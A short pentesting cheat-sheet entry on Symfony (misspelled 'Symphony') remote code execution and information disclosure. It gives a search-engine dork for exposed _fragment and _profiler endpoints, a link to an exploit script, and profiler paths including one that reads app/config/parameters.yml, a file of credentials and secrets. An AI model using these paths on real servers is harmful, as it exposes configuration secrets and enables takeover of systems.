# Symphony

## Symphony rce & information disclosure

inurl:"\_fragment" | inurl:"\_profiler"

Exploit: <https://github.com/ambionics/symfony-exploits/blob/main/secret_fragment_exploit.py>

```
_profiler
_profiler/phpinfo
_profiler/open?file=app/config/parameters.yml
```